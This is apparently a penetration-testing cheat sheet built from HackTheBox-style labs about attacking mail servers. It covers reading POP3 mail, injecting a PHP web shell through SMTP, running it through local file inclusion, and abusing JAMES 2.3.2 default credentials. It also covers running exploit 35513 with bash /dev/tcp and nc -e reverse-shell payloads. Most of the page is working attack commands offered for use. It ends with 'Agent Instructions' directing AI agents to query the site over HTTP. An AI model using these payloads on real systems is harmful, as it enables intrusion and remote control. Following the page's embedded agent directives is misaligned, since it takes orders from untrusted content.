# Email SMTP

## Read emails

```
telnet 10.x.x.x 110
nc -nv 10.x.x.x 110
USER mindy
PASS hello
STAT
RETR 2

+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,
Here is your password.. blah blah blah
```

## Send email with telnet

* SMTP: 25
* Bonus: Inject a php exploit.. you will need an LFI to read/execute it though
* REF: [PBX-PhpEmailExploit](/04-webapps/pbx-elastix.md#email-php-injection)

```
telnet $IP 25
EHLO beep.htb               ..Any hello will work
VRFY hacked@localhost       ..rejected
VRFY asterisk@localhost     ..Verified
mail from:pwn@hacked.com
rcpt to:askerisk@localhost  ..Same as Verified
data                        ..Begin Email
Subject:Testing!

Hello                                        ..test #1
<?php echo "Php success"; ?>                 ..test #2
<?php echo system($_REQUEST['command']); ?>  ..test #3

.                                            ..to end the email
quit
```

## sendmail with attachment

* Instead of telnet, EHLO, blah blah...
* Send a Reverse shell php

```
> sendmail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s $IP:25 -f mike@mike.com
```

## execute and connect

* LFI Execution Example (for after you've sent the evil email)

```
> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action

.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
                                                                         |
                                                                        Goal
```

## Files

```
cat /var/mail/askerisk
```

## Thunderbird

* If you have a user/pass, you can open thunderbird to browser emails
* You might find a password that you could use for SSH too!! REF: solidstateHTB

```
thunderbird
create new account: email
mindy@$10.x.x.x
password
read emails
```

## James Server 2.3.2

* Java Apache Mail Enterprise Server (JAMES)
  * Open source SMTP and POP3 mail transfer agent and NNTP news server
  * <https://james.apache.org/>
  * Default Login: **root:root**
* Connect and Reset user-email password
* Then use [Thunderbird](#thunderbird) email to look for clues

```
nmap -p- 10.x.x.x
PORT     STATE SERVICE
25/tcp   open  smtp   ..mail server will be present too
110/tcp  open  pop3   ..mail component
119/tcp  open  nntp   ..not sure this is related
4555/tcp open  rsip   ..JAMES connect port for admin tool!!


nc $IP 4555           ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin          ..fail
root:root            ..ok

help
listusers
setpassword admin password
setpassword mindy password  ..will update a user's email password
```

## James Server Exploit 2.3.2 (RCE)

* 35513 will get you a full-shell
* Requirements:
  * Default login: root/root
  * Must have a working ssh login user/pass (limited is ok)
  * Need to update the payload for reverse-connect
* Will add a weird user account: ../../../etc/bash\_completion.d
* Sends email to our 'weird' user-directory
* When anybody logs into ssh, we will get execution
* Confused?
  * Yes, you need an ssh login already.. but if its limited it wont do much
  * This will get you a **full-shell**, instead of a limited
  * Next step is to look for PrivEsc !!

```
searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'     ..optional

python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

ssh user@server  ..will pop the exploit
nc -nvlp 4444    ..listen
connected        ..with full shell
```

## More

* <https://book.hacktricks.xyz/pentesting/pentesting-smtp>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/03-getting-in/email-smtp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.